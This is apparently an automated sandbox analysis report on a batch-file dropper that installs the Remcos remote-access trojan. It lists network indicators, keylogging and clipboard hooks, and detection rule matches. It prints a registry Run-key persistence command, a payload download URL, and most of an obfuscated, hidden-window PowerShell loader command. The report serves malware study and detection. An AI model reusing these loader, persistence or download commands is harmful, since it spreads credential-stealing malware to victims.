                Source: bhv2369.tmp.18.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhv2369.tmp.18.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: powershell.exe, 00000002.00000002.2286084235.0000014F9006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430167631.0000000005CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv2369.tmp.18.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhv2369.tmp.18.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
                Source: bhv2369.tmp.18.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
                Source: bhv2369.tmp.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
                Source: bhv2369.tmp.18.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
                Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/#n
                Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/?n
                Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/eYyaWC130.bin
                Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://plieltd.top/eYyaWC130.binEn
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                Source: bhv2369.tmp.18.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                Source: bhv2369.tmp.18.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: msiexec.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: bhv2369.tmp.18.drString found in binary or memory: https://www.office.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 52002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52002
                Source: unknownNetwork traffic detected: HTTP traffic on port 52023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52023
                Source: unknownHTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:52002 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:52023 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\SysWOW64\msiexec.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041183A OpenClipboard,GetLastError,18_2_0041183A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_0040987A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_004098E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_004072B5

                E-Banking Fraud

                barindex
                Source: Yara matchFile source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                barindex
                Source: amsi32_3796.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,18_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00401806 NtdllDefWindowProc_W,18_2_00401806
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004018C0 NtdllDefWindowProc_W,18_2_004018C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347AB8F22_2_00007FFD347AB8F2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347AAB462_2_00007FFD347AAB46
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A65FB2_2_00007FFD347A65FB
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A42312_2_00007FFD347A4231
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A26DD2_2_00007FFD347A26DD
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A3BF32_2_00007FFD347A3BF3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347A4C2D2_2_00007FFD347A4C2D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3487A19A2_2_00007FFD3487A19A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04C6E9085_2_04C6E908
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04C6F1D85_2_04C6F1D8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04C6E5C05_2_04C6E5C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044B04018_2_0044B040
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0043610D18_2_0043610D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044731018_2_00447310
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044A49018_2_0044A490
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0040755A18_2_0040755A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0043C56018_2_0043C560
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044B61018_2_0044B610
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044D6C018_2_0044D6C0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004476F018_2_004476F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044B87018_2_0044B870
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044081D18_2_0044081D
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0041495718_2_00414957
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004079EE18_2_004079EE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00407AEB18_2_00407AEB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044AA8018_2_0044AA80
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00412AA918_2_00412AA9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404B7418_2_00404B74
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404B0318_2_00404B03
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_0044BBD818_2_0044BBD8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404BE518_2_00404BE5
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00404C7618_2_00404C76
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00415CFE18_2_00415CFE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00416D7218_2_00416D72
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00446D3018_2_00446D30
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00446D8B18_2_00446D8B
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00406E8F18_2_00406E8F
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040503819_2_00405038
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041208C19_2_0041208C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004050A919_2_004050A9
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040511A19_2_0040511A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043C13A19_2_0043C13A
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004051AB19_2_004051AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044930019_2_00449300
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0040D32219_2_0040D322
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A4F019_2_0044A4F0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043A5AB19_2_0043A5AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041363119_2_00413631
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044669019_2_00446690
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A73019_2_0044A730
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004398D819_2_004398D8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_004498E019_2_004498E0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0044A88619_2_0044A886
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0043DA0919_2_0043DA09
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00438D5E19_2_00438D5E
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00449ED019_2_00449ED0
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_0041FE8319_2_0041FE83
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 19_2_00430F5419_2_00430F54
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004050C220_2_004050C2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004014AB20_2_004014AB
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040513320_2_00405133
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004051A420_2_004051A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040124620_2_00401246
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040CA4620_2_0040CA46
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040523520_2_00405235
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_004032C820_2_004032C8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_0040168920_2_00401689
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00402F6020_2_00402F60
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 00416760 appears 69 times
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6102
                Source: unknownProcess created: Commandline size = 6126
                Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 6102Jump to behavior
                Source: amsi32_3796.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winBAT@26/13@10/4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,18_2_004182CE
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,20_2_00410DE1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,18_2_00418758
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,18_2_00413D4C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 18_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource,18_2_004148B6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Satisfiable.InsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-ASN50U
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1pb3zbc.hsw.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" "
                Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2448
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3796
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: msiexec.exe, msiexec.exe, 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: msiexec.exe, 00000012.00000002.2745333642.00000000051DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Windows\SysWOW64\msiexec.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_19-33249
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn 